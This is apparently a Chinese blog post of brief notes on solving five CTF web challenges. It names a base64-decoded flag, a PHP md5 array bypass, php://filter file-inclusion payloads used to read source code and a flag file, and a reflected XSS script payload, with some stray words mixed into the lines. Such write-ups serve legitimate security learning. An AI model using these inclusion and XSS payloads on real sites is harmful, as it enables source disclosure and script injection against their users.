CTF-1-5題筆記
CTF-1-5題筆記
POST
put me a message php
ZmxhZ3twdXRfcmVxdWVzdHVoMjEyMzJ9 base64解碼spa
F12
查看頁面源代碼和請求包頭拼湊成flag3d
Code~md5
獲得php代碼 輸入參數v1[]=1&&v2[]=2&&v3[] code
獲得flagblog
Include
重點難點對我而言ip
查看include1.phpmd5
構造僞協議get
php://filter/read=convert.base64-encode/resource=include1(//注意不用加後綴.php)string
解碼知道include1過濾了flag,但有提示include2base64
再從新看include2解碼發現沒有過濾flag
構造僞協議 但要用rot13而且是include2下而非include1
php://filter/read=string.rot13/resource=flag
獲得flag
XSS
這個好像沒有設置過濾,直接輸入"><script>alert('XSS');</script>就繞過了
得到Key
Md5解碼
"><script>alert('XSS');</script>
進行md5解密
心得:經過作題更加深入理解這些方法。今天搞了很久第六題沒搞懂啊,各類大小寫,雙寫,畸形,.htaccess仍是不行啊,提示沒搞懂,靠。黑名單我特麼都搞不來,菜!!!
相關文章
- 1. 刷題筆記
- 2. 筆記題
- 3. map parseInt(筆試題筆記)
- 4. 【2018】筆試題筆記
- 5. 錯題筆記(十題)
- 6. leetcode刷題筆記
- 7. 刷題筆記 - 0422
- 8. 面試題筆記
- 9. DSP問題筆記
- 10. JAVA刷題筆記
- 更多相關文章...
- • Markdown 標題 - Markdown 教程
- • jQuery Mobile 主題 - jQuery Mobile 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • PHP Ajax 跨域問題最佳解決方案
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 刷題筆記
- 2. 筆記題
- 3. map parseInt(筆試題筆記)
- 4. 【2018】筆試題筆記
- 5. 錯題筆記(十題)
- 6. leetcode刷題筆記
- 7. 刷題筆記 - 0422
- 8. 面試題筆記
- 9. DSP問題筆記
- 10. JAVA刷題筆記